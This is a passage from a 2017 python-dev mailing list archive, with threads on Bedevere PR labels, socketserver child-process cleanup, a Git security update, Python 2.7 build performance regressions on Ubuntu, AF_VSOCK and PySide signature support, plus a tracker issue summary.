3.4 (maybe 3.3. http://bugs.python.org/issue22635 7 msgs #31179: Speed-up dict.copy() up to 5.5 times. 
http://bugs.python.org/issue31179 7 msgs #31119: Signal tripped flags need memory barriers http://bugs.python.org/issue31119 6 msgs #31143: lib2to3 requires source files for fixes http://bugs.python.org/issue31143 6 msgs #27755: Retire DynOptionMenu with a ttk Combobox http://bugs.python.org/issue27755 4 msgs #29910: Ctrl-D eats a character on IDLE http://bugs.python.org/issue29910 4 msgs #30849: test_stress_delivery_dependent() of test_signal randomly fails http://bugs.python.org/issue30849 4 msgs Issues closed (45) ================== #19903: Idle: Use inspect.signature for calltips http://bugs.python.org/issue19903 closed by terry.reedy #29736: Optimize builtin types constructor http://bugs.python.org/issue29736 closed by haypo #30051: Document that the random module doesn't support fork http://bugs.python.org/issue30051 closed by haypo #30229: Closing a BufferedRandom calls lseek() mutliple times http://bugs.python.org/issue30229 closed by haypo #30369: test_thread crashed with SIGBUS on AMD64 FreeBSD 10.x Shared 3 http://bugs.python.org/issue30369 closed by haypo #30382: test_stdin_broken_pipe() of test_asyncio failed randomly on AM http://bugs.python.org/issue30382 closed by haypo #30653: test_socket hangs in ThreadableTest.tearDown() on AMD64 FreeBS http://bugs.python.org/issue30653 closed by haypo #30683: Enhance doctest support in regrtest --list-cases http://bugs.python.org/issue30683 closed by haypo #30834: Warning -- files was modified by test_import, After: ['@test http://bugs.python.org/issue30834 closed by haypo #30841: Fix a variable shadowing warning in Python-ast.c http://bugs.python.org/issue30841 closed by lukasz.langa #30845: [3.5] test_first_completed_some_already_completed() of test_co http://bugs.python.org/issue30845 closed by haypo #30857: test_bsddb3 hangs longer than 37 minutes on x86 Tiger 2.7 http://bugs.python.org/issue30857 closed by haypo #30885: test_subprocess hangs on AMD64 Windows8.1 Refleaks 3.x http://bugs.python.org/issue30885 closed by haypo #30982: AMD64 Windows8.1 Refleaks 3.x: compilation error, cannot open http://bugs.python.org/issue30982 closed by haypo #31010: test_socketserver.test_ForkingTCPServer(): threading_cleanup() http://bugs.python.org/issue31010 closed by haypo #31029: test_tokenize fails when run directly http://bugs.python.org/issue31029 closed by serhiy.storchaka #31036: building the python docs requires the blurb module http://bugs.python.org/issue31036 closed by larry #31041: test_handle_called_with_mp_queue() of test_logging: threading_ http://bugs.python.org/issue31041 closed by haypo #31045: Add a language switch to the Python documentation http://bugs.python.org/issue31045 closed by mdk #31068: [2.7] test_ttk_guionly hangs at self.tk.call('update') on AMD6 http://bugs.python.org/issue31068 closed by haypo #31070: test_threaded_import: KeyError ignored in _get_module_lock. I just pushed a change to Bedevere to help track what stage a pull request is in. The stages are: - awaiting review - awaiting core review - awaiting changes - awaiting change review - awaiting merge The "review" stage is for when a pull request has no reviews either approving or requesting changes (this only applies to PRs not by a core dev; all PRs created by a core dev are flagged as awaiting merge immediately). The "core review" stage is when a review has been done by one or more non-core folk, but no core devs. 
The idea with the distinction is to encourage people to help in doing initial reviewing of PRs who happen to not be core devs since triaging issues and reviewing pull requests is the biggest chunk of work in maintaining CPython. The "changes" stage occurs when a core dev requests changes to a PR (a non-core dev review will not trigger this). A comment will be left to this effect with instructions for the PR creator to leave a comment saying "I didn't expect the Spanish Inquisition" to signal when they believe they are done addressing the reviewer's comments (there is also appropriate comments to explain the quote along with an easter egg(s) :) . The "change review" label means that the PR creator left the Spanish Inquisition quote and so now the core dev(s) who requested changes should re-review the PR. There will be a comment mentioning the core devs to this effect so that they will get a proper GitHub notification and they can check the label to see if the PR creator believes they are ready for another round of review (compared to now where you have to hunt around in the PR to see if it's ready for another review). The "merge" label means the PR has received an approving review from a core dev and so it should be ready to go. Now when any state change happens to trigger these labels, any preexisting "awaiting" label will be cleared and the new one set. But removing or setting a label manually won't trigger an action, so in this instance you can override Bedevere manually until some later event occurs which triggers an automatic update. One thing I do want to call out is that it's now more important that core devs leave appropriate "approved" and "request changes" reviews through the GitHub UI instead of just leaving a comment when they approve or want changes to a PR, respectively. Not only is this necessary to automate this part of the stage labeling, but it also visibly exposes in the GitHub UI the review state of a PR. I'm not backfilling the open PRs as it's more work and I don't want to do said work. ;) But as PRs are opened, reviewed, etc., things should slowly trickle their way through the various PRs. I should mention this is the second-to-last "intrusive" workflow change I have planned to introduce some new aspect to the workflow (the last one being a status check for a news entry after every branch has been blurbified). After these two changes land, everything else I have planned is just touching things up (e.g. the CLA check becoming a status check instead of a label, touching up CONTRIBUTING.md, etc.). I think some other people have plans to improve things as well, but at least my TODO list of "radical" changes to our workflow is almost done! -------------- next part -------------- An HTML attachment was scrubbed... URL: From rmsr at lab.net Fri Aug 11 18:34:51 2017 From: rmsr at lab.net (Ryan Smith-Roberts) Date: Fri, 11 Aug 2017 22:34:51 +0000 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: I agree that blocking shutdown by default isn't a good idea. A child will eventually get indefinitely stuck on a nonresponsive connection and hang the whole server. This behavior change is surprising and should be reverted in master, and definitely not backported. As for block-timeout or block-timeout-kill, waiting more than zero seconds in server_close() should be optional, because you're right that the best timeout is circumstantial. 
Since ThreadingMixIn also leaks threads, server_close() could grow a timeout flag (following the socket module timeout convention) and maybe a terminate boolean. ThreadingMixIn could then also be fixed. I'm not sure how useful that is though, since I'd bet almost all users of socketserver exit the process shortly after server_close(). Plus it can't be backported to the feature-freeze branches. It seems like this is getting complicated enough that putting the fix in test_socketserver.py is probably best. Another solution is to add a secret terminating-close flag to ForkingMixIn just for the tests. Is that good practice in the stdlib? On Fri, Aug 11, 2017 at 6:46 AM Victor Stinner wrote: > Hi, > > I'm working on reducing the failure rate of Python CIs (Travis CI, > AppVeyor, buildbots). For that, I'm trying to reduce test side effects > using "environment altered" warnings. This week, I worked on > support.reap_children() which detects leaked child processes (usually > created with os.fork()). > > I found a bug in the socketserver module: it waits for child processes > completion, but only in non-blocking mode. If a child process takes > too long, the server will never reads its exit status and so the > server leaks "zombie processes". Leaking processes can increase the > memory usage, spawning new processes can fail, etc. > > => http://bugs.python.org/issue31151 > > I changed the code to call waitpid() in blocking mode on each child > process on server_close(), to ensure that all children completed when > on server close: > > > https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 > > After pushing my change, I'm not sure anymore if it's a good idea. > There is a risk that server_close() blocks if a child is stuck on a > socket recv() or send() for some reasons. > > Should we relax the code by waiting a few seconds (problem: hardcoded > timeouts are always a bad idea), or *terminate* processes (SIGKILL on > UNIX) if they don't complete fast enough? > > I don't know which applications use socketserver. How I can test if it > breaks code in the wild? > > At least, I didn't notice any regression on Python CIs. > > Well, maybe the change is ok for the master branch. But I would like > your opinion because now I would like to backport the fix to 2.7 and > 3.6 branches. It might break some applications. > > If we *cannot* backport such change to 2.7 and 3.6 because it changes > the behaviour, I will fix the bug in test_socketserver.py instead. > > What do you think? > > Victor > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/rmsr%40lab.net > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vadmium+py at gmail.com Sat Aug 12 09:07:30 2017 From: vadmium+py at gmail.com (Martin Panter) Date: Sat, 12 Aug 2017 13:07:30 +0000 Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes In-Reply-To: References: Message-ID: > On Fri, Aug 11, 2017 at 6:46 AM Victor Stinner > wrote: >> => http://bugs.python.org/issue31151 >> >> I changed the code to call waitpid() in blocking mode on each child >> process on server_close(), to ensure that all children completed when >> on server close: >> >> https://github.com/python/cpython/commit/aa8ec34ad52bb3b274ce91169e1bc4a598655049 >> >> After pushing my change, I'm not sure anymore if it's a good idea. 
>> There is a risk that server_close() blocks if a child is stuck on a
>> socket recv() or send() for some reason.

I agree that this could be an unwanted change in behaviour. For example, a web browser could be holding an HTTP 1.1 persistent connection open.

>> Should we relax the code by waiting a few seconds (problem: hardcoded
>> timeouts are always a bad idea), or *terminate* processes (SIGKILL on
>> UNIX) if they don't complete fast enough?

It does seem reasonable to have an option to clean up background forks, whether by blocking or by terminating them immediately.

On 11 August 2017 at 22:34, Ryan Smith-Roberts wrote:
> Since ThreadingMixIn also leaks threads,
> server_close() could grow a timeout flag (following the socket module
> timeout convention) and maybe a terminate boolean. ThreadingMixIn could then
> also be fixed.

You could do a blocking join on each background thread. But I suspect there is no perfect way to terminate the threads without waiting. Using ThreadingMixIn.daemon_threads and exiting the interpreter might have to be good enough.

From chekat2 at gmail.com Sun Aug 13 19:11:03 2017
From: chekat2 at gmail.com (Cheryl Sabella)
Date: Sun, 13 Aug 2017 19:11:03 -0400
Subject: [Python-Dev] Git and Mercurial Security Update
Message-ID: 

http://www.esecurityplanet.com/threats/git-svn-and-mercurial-open-source-version-control-systems-update-for-critical-security-vulnerability.html

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From rymg19 at gmail.com Sun Aug 13 22:05:48 2017
From: rymg19 at gmail.com (rymg19 at gmail.com)
Date: Sun, 13 Aug 2017 19:05:48 -0700
Subject: [Python-Dev] Git and Mercurial Security Update
In-Reply-To: <>
Message-ID: 

Interesting, but does this really concern Python? I mean, it's hosted on GitHub and doesn't seem to recommend use of ssh URLs anyway...

--
Ryan
Yoko Shimomura, ryo (supercell/EGOIST), Hiroyuki Sawano >> everyone else
http://refi64.com

On Aug 13, 2017 at 8:11 PM, > wrote:

http://www.esecurityplanet.com/threats/git-svn-and-mercurial-open-source-version-control-systems-update-for-critical-security-vulnerability.html
_______________________________________________
Python-Dev mailing list
Python-Dev at python.org
https://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: https://mail.python.org/mailman/options/python-dev/rymg19%40gmail.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From mariatta.wijaya at gmail.com Sun Aug 13 22:25:19 2017
From: mariatta.wijaya at gmail.com (Mariatta Wijaya)
Date: Sun, 13 Aug 2017 19:25:19 -0700
Subject: [Python-Dev] Git and Mercurial Security Update
In-Reply-To: 
References: 
Message-ID: 

Thanks for the info Cheryl.

For those on macOS, you can update your local git using Homebrew as follows.

If you have installed git on macOS using Homebrew before:

$ brew upgrade git

If you did not install git using Homebrew (for example, if you've been using the built-in git):

$ brew install git

`git --version` tells you what version you have. It should be 2.14.1 now.

On Windows, perhaps see https://confluence.atlassian.com/bitbucketserver/installing-and-upgrading-git-776640906.html#InstallingandupgradingGit-InstallorupgradeGitonWindows

Mariatta Wijaya

On Sun, Aug 13, 2017 at 7:05 PM, rymg19 at gmail.com wrote:
> Interesting, but does this really concern Python? I mean, it's hosted on
> GitHub and doesn't seem to recommend use of ssh URLs anyway...
>
>
> --
> Ryan
> Yoko Shimomura, ryo (supercell/EGOIST), Hiroyuki Sawano >> everyone else
> http://refi64.com
>
> On Aug 13, 2017 at 8:11 PM, > wrote:
>
> http://www.esecurityplanet.com/threats/git-svn-and-mercurial-open-source-version-control-systems-update-for-critical-security-vulnerability.html
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: https://mail.python.org/mailman/options/python-dev/rymg19%40gmail.com
>
>
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: https://mail.python.org/mailman/options/python-dev/mariatta.wijaya%40gmail.com
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From victor.stinner at gmail.com Mon Aug 14 04:07:23 2017
From: victor.stinner at gmail.com (Victor Stinner)
Date: Mon, 14 Aug 2017 10:07:23 +0200
Subject: [Python-Dev] Git and Mercurial Security Update
In-Reply-To: 
References: 
Message-ID: 

By the way, I suggest you enable two-factor authentication on GitHub. You can use FreeOTP on your smartphone, or buy a yubikey nano, for example.

Victor

On 14 August 2017 at 03:11, "Cheryl Sabella" wrote:
> http://www.esecurityplanet.com/threats/git-svn-and-mercurial-open-source-version-control-systems-update-for-critical-security-vulnerability.html
>
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From victor.stinner at gmail.com Wed Aug 16 10:13:09 2017
From: victor.stinner at gmail.com (Victor Stinner)
Date: Wed, 16 Aug 2017 16:13:09 +0200
Subject: [Python-Dev] socketserver ForkingMixin waiting for child processes
In-Reply-To: 
References: 
Message-ID: 

Hi,

The first bug was that test_socketserver "leaked" child processes: it means that the socketserver API creates zombie processes depending on how long the child processes take to complete. If you don't want to backport my change waiting until child processes complete, you need to fix the bug differently, so test_socketserver doesn't leak processes (ex: wait until child processes complete in test_socketserver).

2017-08-12 0:34 GMT+02:00 Ryan Smith-Roberts :
> I agree that blocking shutdown by default isn't a good idea. A child will
> eventually get indefinitely stuck on a nonresponsive connection and hang the
> whole server. This behavior change is surprising and should be reverted in
> master, and definitely not backported.

Right, a child process can hang. The question is how to handle such a case. I see 3 choices:

* Do nothing: Python 3.6 behaviour
* Blocking wait until the child process completes
* Wait a few seconds and then kill the process after a deadline

In Python 3.6, the process is stuck and continues to run even after shutdown() and server_close(). That's surprising and doesn't seem right to me.

> As for block-timeout or block-timeout-kill, waiting more than zero seconds
> in server_close() should be optional, because you're right that the best
> timeout is circumstantial.

Maybe we need to add a new method that waits up to N seconds for children to complete, then sends SIGTERM, and finally sends SIGKILL if children take longer than N seconds to complete.
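To make the escalation concrete, such a helper could look like the sketch below (the function name, the per-signal grace period, and the PID-set argument mirroring ForkingMixIn's active_children are all hypothetical, not an actual socketserver API):

    import os
    import signal
    import time

    def reap_children_gracefully(pids, grace=5.0):
        # Hypothetical "graceful stop": reap child PIDs for up to
        # `grace` seconds, then SIGTERM the survivors, then SIGKILL
        # them, reaping again after each signal.
        for sig in (None, signal.SIGTERM, signal.SIGKILL):
            if sig is not None:
                for pid in list(pids):
                    try:
                        os.kill(pid, sig)
                    except ProcessLookupError:
                        pids.discard(pid)  # child is already gone
            deadline = time.monotonic() + grace
            while pids and time.monotonic() < deadline:
                for pid in list(pids):
                    try:
                        reaped, _ = os.waitpid(pid, os.WNOHANG)
                    except ChildProcessError:
                        reaped = pid  # already reaped elsewhere
                    if reaped:
                        pids.discard(pid)
                time.sleep(0.05)
            if not pids:
                return

Note that the worst case here is three full grace periods, which is one more reason the actual deadline has to be the application's choice.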
So the developer becomes responsible for killing child processes. In the Apache world, it's called the "graceful" stop: https://httpd.apache.org/docs/2.4/stopping.html

> Since ThreadingMixIn also leaks threads,
> server_close() could grow a timeout flag (following the socket module
> timeout convention) and maybe a terminate boolean.

Oh, I didn't know that ThreadingMixIn also leaks threads. That's a similar but different issue. It's not easily possible to "kill" a thread.

> Plus it can't be backported to the feature-freeze branches.

IMHO leaking zombie processes is a bug, but I'm OK with keeping the bugs and only fixing the tests.

Victor

From elprans at gmail.com Wed Aug 16 18:31:32 2017
From: elprans at gmail.com (Elvis Pranskevichus)
Date: Wed, 16 Aug 2017 18:31:32 -0400
Subject: [Python-Dev] Help requested with Python 2.7 performance regression
In-Reply-To: 
References: <20170301122824.3f1f3689@subdivisions.wooz.org>
Message-ID: 

After much testing I found what is causing the regression in 16.04 and later. There are several distinct causes, which are attributed to the choices made in debian/rules and the changes in GCC.

Cause #1: the decision to compile `Modules/_math.c` with `-fPIC` *and* link it statically into the python executable [1]. This causes the majority of the slowdown. This may be a bug in GCC or simply a constraint; I didn't find anything specific on this topic, although there are a lot of old bug reports regarding the interaction of -fPIC with -flto.

Cause #2: the enablement of `fpectl` [2], specifically passing `--with-fpectl` to `configure`. fpectl is disabled in python.org builds by default and its use is discouraged. Yet, Debian builds enable it unconditionally, and it seems to cause a significant performance degradation. It's much less noticeable on 14.04 with GCC 4.8.0, but on more recent releases the performance difference seems to be larger.

Plausible Cause #3: stronger stack smashing protection in 16.04, which uses -fstack-protector-strong, whereas 14.04 and earlier used -fstack-protector (with lesser performance overhead).

Also, debian/rules limits the scope of PGO's PROFILE_TASK to 377 test suites vs upstream's 397, which affects performance somewhat negatively, but this is not definitive. What are the reasons behind the trimming of the tests used for PGO?

Without fpectl, and without -fPIC on _math.c, 2.7.12 built on 16.04 is slower than stock 2.7.6 on 14.04 by about 0.9% in my pyperformance runs [3]. This is in contrast to a whopping 7.95% slowdown when comparing stock versions.

Finally, a vanilla Python 2.7.12 build using GCC 5.4.0, default CFLAGS, default PROFILE_TASK and default Modules/Setup.local consistently runs faster in benchmarks than 2.7.6 (by about 0.7%), but I was not able to pinpoint the exact reason for this difference.

Note: the percentages above are the relative change in the geometric mean of pyperformance benchmark results.

[1] https://git.launchpad.net/~usd-import-team/ubuntu/+source/python2.7/tree/debian/rules?h=ubuntu/xenial-updates#n421
[2] https://git.launchpad.net/~usd-import-team/ubuntu/+source/python2.7/tree/debian/rules?h=ubuntu/xenial-updates#n117
[3] https://docs.google.com/spreadsheets/d/1L3_gxe-AOYJsXFwGZgFko8jaChB0dFPjK5oMO5T5vj4/edit?usp=sharing

Elvis

On Fri, Mar 3, 2017 at 10:27 AM, Louis Bouchard <louis.bouchard at canonical.com> wrote:
> Hello,
>
> On 03/03/2017 at 15:37, Louis Bouchard wrote:
> > Hello,
> >
> > On 03/03/2017 at 15:31, Victor Stinner wrote:
> >>> Out of curiosity, I ran the set of benchmarks in two LXC containers running
> >>> centos7 (2.7.5 + gcc 4.8.5) and Fedora 25 (2.7.13 + gcc 6.3.x). The benchmarks
> >>> do run faster in 18 benchmarks, slower on 12 and insignificant for the rest (~33
> >>> from memory).
> >>
> >> "faster" or "slower" is relative: I would like to see the ?.??x
> >> faster/slower or percent value. Can you please share the result? I
> >> don't know what is the best output:
> >> python3 -m performance compare centos.json fedora.json
> >> or the new:
> >> python3 -m perf compare_to centos.json fedora.json --table --quiet
> >>
> >> Victor
> >>
> >
> > All the results, including the latest, are in the spreadsheet here (cited in the
> > analysis document):
> >
> > https://docs.google.com/spreadsheets/d/1pKCOpyu4HUyw9YtJugn6jzVGa_zeDmBVNzqmXHtM6gM/edit#gid=1548436297
> >
> > The third column is the ?.??x value that you are looking for, taken directly out of
> > the 'pyperformance analyze' results.
> >
> > I didn't know about the new options, I'll give it a spin & see if I can get a
> > better format.
>
> All the benchmark data using the new format have been uploaded to the
> spreadsheet. Each sheet is prefixed with pct_.
>
> HTH,
>
> Kind regards,
>
> ...Louis
>
>
> --
> Louis Bouchard
> Software engineer, Cloud & Sustaining eng.
> Canonical Ltd
> Ubuntu developer Debian Maintainer
> GPG : 429D 7A3B DD05 B6F8 AF63 B9C4 8B3D 867C 823E 7A61
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: https://mail.python.org/mailman/options/python-dev/elprans%40gmail.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From cavery at redhat.com Thu Aug 17 08:21:35 2017
From: cavery at redhat.com (Cathy Avery)
Date: Thu, 17 Aug 2017 08:21:35 -0400
Subject: [Python-Dev] python issue27584 AF_VSOCK support
Message-ID: <59958A4F.30207@redhat.com>

Hi,

I have a python pull request https://github.com/python/cpython/pull/2489 that introduces AF_VSOCK to the python C socket module. Unfortunately things have gone quiet for several weeks. Since I am new to this process I am unclear on what to expect as the next steps. I believe I have addressed all issues. If I am mistaken please let me know. A real functioning test setup is a bit painful and I would be happy to help in any way I can. The Microsoft Hyper-V team is now introducing support of vsock in the upstream linux kernel so its adoption is spreading amongst the various hypervisors.

Any guidance on the basic timelines would be very helpful.

Thanks,

Cathy

From brett at python.org Thu Aug 17 14:36:41 2017
From: brett at python.org (Brett Cannon)
Date: Thu, 17 Aug 2017 18:36:41 +0000
Subject: [Python-Dev] python issue27584 AF_VSOCK support
In-Reply-To: <59958A4F.30207@redhat.com>
References: <59958A4F.30207@redhat.com>
Message-ID: 

Since everyone is a volunteer, Cathy, there are unfortunately no real timelines. It really comes down to someone who feels they have the knowledge necessary to review the PR having the spare time to do so. So emailing here and saying, "my PR has addressed all the comments and has been ready to go for 29 days; anything else I can do?" is the right thing to up the PR's exposure.

On Thu, 17 Aug 2017 at 08:02 Cathy Avery wrote:
> Hi,
>
> I have a python pull request https://github.com/python/cpython/pull/2489
> that introduces AF_VSOCK to the python C socket module. Unfortunately
> things have gone quiet for several weeks. Since I am new to this process
> I am unclear on what to expect as the next steps. I believe I have
> addressed all issues. If I am mistaken please let me know. A real
> functioning test setup is a bit painful and I would be happy to help in
> any way I can. The Microsoft Hyper-V team is now introducing support of
> vsock in the upstream linux kernel so its adoption is spreading amongst
> the various hypervisors.
>
> Any guidance on the basic timelines would be very helpful.
>
> Thanks,
>
> Cathy
>
>
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe:
> https://mail.python.org/mailman/options/python-dev/brett%40python.org
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From christian at python.org Thu Aug 17 17:38:00 2017
From: christian at python.org (Christian Heimes)
Date: Thu, 17 Aug 2017 23:38:00 +0200
Subject: [Python-Dev] python issue27584 AF_VSOCK support
In-Reply-To: <59958A4F.30207@redhat.com>
References: <59958A4F.30207@redhat.com>
Message-ID: 

On 2017-08-17 14:21, Cathy Avery wrote:
> Hi,
>
> I have a python pull request https://github.com/python/cpython/pull/2489
> that introduces AF_VSOCK to the python C socket module. Unfortunately
> things have gone quiet for several weeks. Since I am new to this process
> I am unclear on what to expect as the next steps. I believe I have
> addressed all issues. If I am mistaken please let me know. A real
> functioning test setup is a bit painful and I would be happy to help in
> any way I can. The Microsoft Hyper-V team is now introducing support of
> vsock in the upstream linux kernel so its adoption is spreading amongst
> the various hypervisors.
>
> Any guidance on the basic timelines would be very helpful.

Hi Cathy,

thanks for your contribution! Your patch looks mostly fine. I pointed out some minor issues in my review.

Regards,
Christian

From tismer at stackless.com Fri Aug 18 04:41:05 2017
From: tismer at stackless.com (Christian Tismer)
Date: Fri, 18 Aug 2017 10:41:05 +0200
Subject: [Python-Dev] __signature__ for PySide ready
Message-ID: 

Hi friends,

in the last months, I have developed signature support for PySide. The module creates the same signatures as are known for plain Python functions.

As a non-trivial addition, the module also handles multiple signatures as a list. I consider this extension to PySide as quite essential and actually more important than for Python itself, because type info is rather crucial for PySide.

Initially, I wrote this as a pure Python 3 extension. Then I was "asked" to port this to Python 2 too, which was quite hairy to do. I'm not sure if I should have done that.

Before I publish this module, I want to ask:
--------------------------------------------

Is it a bad idea to support signatures in Python 2 as well?
Do I introduce a feature that should not exist in Python 2?
Or is it fine to do so?

Please let me know your opinion, I am happy with any result.

Cheers -- Chris

--
Christian Tismer             :^)   tismer at stackless.com
Software Consulting          :     http://www.stackless.com/
Karl-Liebknecht-Str. 121     :     https://github.com/PySide
14482 Potsdam                :     GPG key -> 0xFB7BEE0E
phone +49 173 24 18 776  fax +49 (30) 700143-0023

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 496 bytes
Desc: OpenPGP digital signature
URL: 

From songofacandy at gmail.com Fri Aug 18 07:04:33 2017
From: songofacandy at gmail.com (INADA Naoki)
Date: Fri, 18 Aug 2017 20:04:33 +0900
Subject: [Python-Dev] Could someone review GH-2974 which adds missing PyObject_GC_UnTrack()?
Message-ID: 

Hi.

I created a PR which fixes a potential crash. Serhiy Storchaka approved it already, but he wants one more review from another core dev. I also updated the document after his review. So I need one more reviewer for the PR. Can someone help me?

https://github.com/python/cpython/pull/2974
https://bugs.python.org/issue31095

## Background

For GC types, tp_dealloc should call PyObject_GC_UnTrack() before calling any APIs which can run arbitrary code, including Py_DECREF. Without calling it, GC may happen during tp_dealloc, and the GC will find an object whose refcount is already 0.

I checked all GC types and found some unsafe tp_dealloc implementations. Even the "extending and embedding" document missed the untracking.

Regards,

INADA Naoki

From status at bugs.python.org Fri Aug 18 12:09:19 2017
From: status at bugs.python.org (Python tracker)
Date: Fri, 18 Aug 2017 18:09:19 +0200 (CEST)
Subject: [Python-Dev] Summary of Python tracker Issues
Message-ID: <20170818160919.4883F11A860@psf.upfronthosting.co.za>

ACTIVITY SUMMARY (2017-08-11 - 2017-08-18) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 6133 (+17) closed 36852 (+32) total 42985 (+49) Open issues with patches: 2343 Issues opened (35) ================== #14976: queue.Queue() is not reentrant, so signals and GC can cause de http://bugs.python.org/issue14976 reopened by yselivanov #30747: _Py_atomic_* not actually atomic on Windows with MSVC http://bugs.python.org/issue30747 reopened by steve.dower #30983: eval frame rename in pep 0523 broke gdb's python extension http://bugs.python.org/issue30983 reopened by haypo #31170: expat: utf8_toUtf8 cannot properly handle exhausting buffer http://bugs.python.org/issue31170 reopened by tianlynn #31184: Fix data descriptor detection in inspect.getattr_static http://bugs.python.org/issue31184 opened by davidhalter #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 opened by serhiy.storchaka #31188: Makefile.pre.in: commoninstall: reformat http://bugs.python.org/issue31188 opened by dilyan.palauzov #31189: README.rst: installing multiple versions: typo http://bugs.python.org/issue31189 opened by dilyan.palauzov #31190: ./configure: add ability to build and install only shared libr http://bugs.python.org/issue31190 opened by dilyan.palauzov #31191: Fix grammar in threading.Barrier docs http://bugs.python.org/issue31191 opened by schedutron #31193: re.IGNORECASE strips combining character from lower case of LA http://bugs.python.org/issue31193 opened by David MacIver #31196: Blank line inconsistency between InteractiveConsole and standa http://bugs.python.org/issue31196 opened by Malcolm Smith #31197: Namespace disassembly omits some compiled objects http://bugs.python.org/issue31197 opened by ncoghlan #31199: configure checks fail confusingly under --with-address-sanitiz http://bugs.python.org/issue31199 opened by pmatos #31200: address sanitizer build fails http://bugs.python.org/issue31200 opened by pmatos #31201: module test that failed doesn't exist http://bugs.python.org/issue31201 opened by pmatos #31202: Windows pathlib.Path.glob(pattern)
fixed part of the pattern c http://bugs.python.org/issue31202 opened by aicirbs #31203: socket.IP_PKTINFO is missing from python http://bugs.python.org/issue31203 opened by guerby #31206: IDLE, configdialog: Factor out HighPage class from ConfigDialo http://bugs.python.org/issue31206 opened by terry.reedy #31207: IDLE, configdialog: Factor out ExtPage class from ConfigDialog http://bugs.python.org/issue31207 opened by terry.reedy #31209: MappingProxyType can not be pickled http://bugs.python.org/issue31209 opened by Alex Hayes #31210: Can not import modules if sys.prefix contains DELIM http://bugs.python.org/issue31210 opened by ced #31211: distutils/util.py get_platform() does not identify linux-i686 http://bugs.python.org/issue31211 opened by siming85 #31212: datetime: min date (0001-01-01 00:00:00) can't be converted to http://bugs.python.org/issue31212 opened by Dave Johansen #31213: __context__ reset to None in nested exception http://bugs.python.org/issue31213 opened by Christopher Stelma #31215: Add version changed notes for OpenSSL 1.1.0 compatibility http://bugs.python.org/issue31215 opened by ncoghlan #31217: test_code leaked [1, 1, 1] memory blocks on x86 Gentoo Refleak http://bugs.python.org/issue31217 opened by haypo #31218: del expects __delitem__ if __setitem__ is defined http://bugs.python.org/issue31218 opened by raumzeitkeks #31222: datetime.py implementation of .replace inconsistent with C imp http://bugs.python.org/issue31222 opened by p-ganssle #31224: Missing definition of frozen module http://bugs.python.org/issue31224 opened by marco.buttu #31226: shutil.rmtree fails when target has an internal directory junc http://bugs.python.org/issue31226 opened by vidartf #31227: regrtest: reseed random with the same seed before running a te http://bugs.python.org/issue31227 opened by haypo #31229: wrong error messages when too many kwargs are received http://bugs.python.org/issue31229 opened by Oren Milman #31230: Define a general "asynchronous operation introspection" protoc http://bugs.python.org/issue31230 opened by ncoghlan #31232: Backport the new custom "print >> sys.stderr" error message? 
http://bugs.python.org/issue31232 opened by ncoghlan Most recent 15 issues with no replies (15) ========================================== #31224: Missing definition of frozen module http://bugs.python.org/issue31224 #31207: IDLE, configdialog: Factor out ExtPage class from ConfigDialog http://bugs.python.org/issue31207 #31202: Windows pathlib.Path.glob(pattern) fixed part of the pattern c http://bugs.python.org/issue31202 #31196: Blank line inconsistency between InteractiveConsole and standa http://bugs.python.org/issue31196 #31191: Fix grammar in threading.Barrier docs http://bugs.python.org/issue31191 #31190: ./configure: add ability to build and install only shared libr http://bugs.python.org/issue31190 #31189: README.rst: installing multiple versions: typo http://bugs.python.org/issue31189 #31188: Makefile.pre.in: commoninstall: reformat http://bugs.python.org/issue31188 #31182: Suggested Enhancements to zipfile & tarfile command line inter http://bugs.python.org/issue31182 #31181: Segfault in gcmodule.c:360 visit_decref (PyObject_IS_GC(op)) http://bugs.python.org/issue31181 #31180: test_multiprocessing_spawn hangs randomly on x86 Windows7 3.6 http://bugs.python.org/issue31180 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31177: unittest mock's reset_mock throws an error when an attribute h http://bugs.python.org/issue31177 #31176: Is a UDP transport also a ReadTransport/WriteTransport? http://bugs.python.org/issue31176 #31165: null pointer deref and segfault in list_slice (listobject.c:45 http://bugs.python.org/issue31165 Most recent 15 issues waiting for review (15) ============================================= #31229: wrong error messages when too many kwargs are received http://bugs.python.org/issue31229 #31185: Miscellaneous errors in asyncio speedup module http://bugs.python.org/issue31185 #31184: Fix data descriptor detection in inspect.getattr_static http://bugs.python.org/issue31184 #31183: `Dis` module doesn't know how to disassemble async generator o http://bugs.python.org/issue31183 #31179: Speed-up dict.copy() up to 5.5 times. http://bugs.python.org/issue31179 #31178: [EASY] subprocess: TypeError: can't concat str to bytes, in _e http://bugs.python.org/issue31178 #31175: Exception while extracting file from ZIP with non-matching fil http://bugs.python.org/issue31175 #31151: test_socketserver: Warning -- reap_children() reaped child pro http://bugs.python.org/issue31151 #31120: [2.7] Python 64 bit _ssl compile fails due missing 